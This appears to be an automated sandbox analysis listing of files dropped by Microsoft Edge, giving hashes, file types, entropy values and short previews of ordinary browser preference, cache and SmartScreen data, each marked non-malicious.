                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20480
                                                                                                                                                      Entropy (8bit):0.46731661083066856
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                      MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                      SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                      SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                      SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):270336
                                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):262512
                                                                                                                                                      Entropy (8bit):9.553120663130604E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:LsNlPhVe:Ls3ZVe
                                                                                                                                                      MD5:B473FBB788376C5040A0ED991D56A984
                                                                                                                                                      SHA1:396B61344C0FB825D7C5660A145C0A421EC30DE9
                                                                                                                                                      SHA-256:558F016534BC9C1E702D3CD041EA6F476A9831FC859B0134F52C7BEFAF3A23A2
                                                                                                                                                      SHA-512:B25123344CE15DC066415AD75A9C95B7B1A7B2955024380CB4767A132D2269C894296F9F629D53D33E03244BA12C98E2A3A558F4FA046EE94B31128C7E5E88AA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:............................................../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):29
                                                                                                                                                      Entropy (8bit):3.922828737239167
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                      MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                      SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                      SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                      SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:customSynchronousLookupUris_0
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):35302
                                                                                                                                                      Entropy (8bit):7.99333285466604
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                      MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                      SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                      SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                      SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):18
                                                                                                                                                      Entropy (8bit):3.5724312513221195
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                                                                      MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                                                                      SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                                                                      SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                                                                      SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:edgeSettings_2.0-0
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3581
                                                                                                                                                      Entropy (8bit):4.459693941095613
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                      MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                      SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                      SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                      SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):47
                                                                                                                                                      Entropy (8bit):4.493433469104717
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                                                                      MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                                                                      SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                                                                      SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                                                                      SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:synchronousLookupUris_636976985063396749.rel.v2
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):35302
                                                                                                                                                      Entropy (8bit):7.99333285466604
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                      MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                      SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                      SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                      SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):86
                                                                                                                                                      Entropy (8bit):4.389669793590032
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQOn:YQ3Kq9X0dMgAEiLIMn
                                                                                                                                                      MD5:03B6D5E81A4DC4D4E6C27BE1E932B9D9
                                                                                                                                                      SHA1:3C5EF0615314BDB136AB57C90359F1839BDD5C93
                                                                                                                                                      SHA-256:73B017F7C5ECD629AD41D14147D53F7D3D070C5967E1E571811A6DB39F06EACC
                                                                                                                                                      SHA-512:0037EB23CCDBDDE93CFEB7B9A223D59D0872D4EC7F5E3CA4F7767A7301E96E1AF1175980DC4F08531D5571AFB94DF789567588DEB2D6D611C57EE4CC05376547
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8094
                                                                                                                                                      Entropy (8bit):5.804599270450843
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:asNAxtlueiRUvqQikiA6qRAq1k8SPxVLZ7VTiq:asNASCzhiA6q3QxVNZTiq
                                                                                                                                                      MD5:639E797F49A98A3760C905606E328EB3
                                                                                                                                                      SHA1:7ACDE73F9C854BA13153CA0BF8AEEC828A4270BA
                                                                                                                                                      SHA-256:7803E363E85CE4A55D2E7C34FA384B9A319439A3D0E3B97DAA6C45AF22D91393
                                                                                                                                                      SHA-512:82AE543B82B96848018ABA0FCCC2492BD94E1BAF238BD8E908FB2140685F0C1D215E3A53B2E5EABC9DE92062719A62C4EA063A8027E32E5CAB4CB002CE0AAC1E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):23002
                                                                                                                                                      Entropy (8bit):6.046605093712033
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:2tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhiqUAiEpEV9SLTW:6MkbJrT8IeQc5d1fUAiEpSSLC
                                                                                                                                                      MD5:228F95FD8E56A784E6173C2C50FF1525
                                                                                                                                                      SHA1:161972220EE0494D089D1EB3B771B0EFDEA78D00
                                                                                                                                                      SHA-256:776F623400D21550FE3613CF0886BD2EF38137619C9F6A2C5A8D574B236CBD00
                                                                                                                                                      SHA-512:7E06477848D587AE6B0B1A9D7C44C5D0FAA76493257FE9F71F8F507343363A1AE76040F645B8015EC6D150A967011F9EB89869D60EF9EE8ED98F669DB0F3B463
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377790692304850","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733317097"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):24028
